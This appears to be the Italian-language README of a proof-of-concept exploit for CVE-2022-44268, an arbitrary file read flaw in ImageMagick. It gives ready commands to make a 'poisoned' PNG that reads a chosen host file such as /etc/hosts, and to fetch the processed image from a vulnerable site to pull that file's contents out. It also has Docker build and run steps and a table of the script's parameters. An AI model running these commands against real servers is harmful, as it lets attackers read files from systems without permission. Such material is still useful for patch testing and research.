
CVE-2022-44268 ImageMagick Lettura arbitraria di file - Exploit Proof of Concept
CVE-2022-44268 ImageMagick Lettura Arbitraria di File - Exploit Proof of Concept
Avvelena l'immagine ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Carica l'immagine PNG avvelenata.
Verifica se l'exploit ha avuto successo 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Build
docker build -t cve-2022-44268 .
Esegui
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Parametro | Descrizione | Tipo |
|---|
| --url | L'URL dell'immagine PNG caricata | String |
| --image | File PNG di input | File |
| --output | File PNG di output | File |
| --file-to-read | File da leggere dall'host vulnerabile | String |